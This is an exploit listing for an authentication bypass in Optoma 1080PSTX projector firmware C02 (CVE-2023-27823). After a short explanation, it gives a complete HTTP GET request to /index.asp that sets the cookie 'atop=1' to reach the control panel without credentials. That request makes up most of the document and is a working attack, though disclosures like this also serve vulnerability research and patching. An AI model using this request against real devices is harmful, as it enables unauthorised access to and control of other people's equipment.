# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass# Date: 2023/05/09# Exploit Author: Anthony Cole# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Vendor Homepage: http://optoma.com# Version: Optoma 1080PSTX Firmware C02# Tested on: N/A# CVE : CVE-2023-27823
Details
By default the web interface of the 1080PSTX requires a username and password to access the application control panel.However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".
GET /index.asp HTTP/1.1
Host: projector
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close
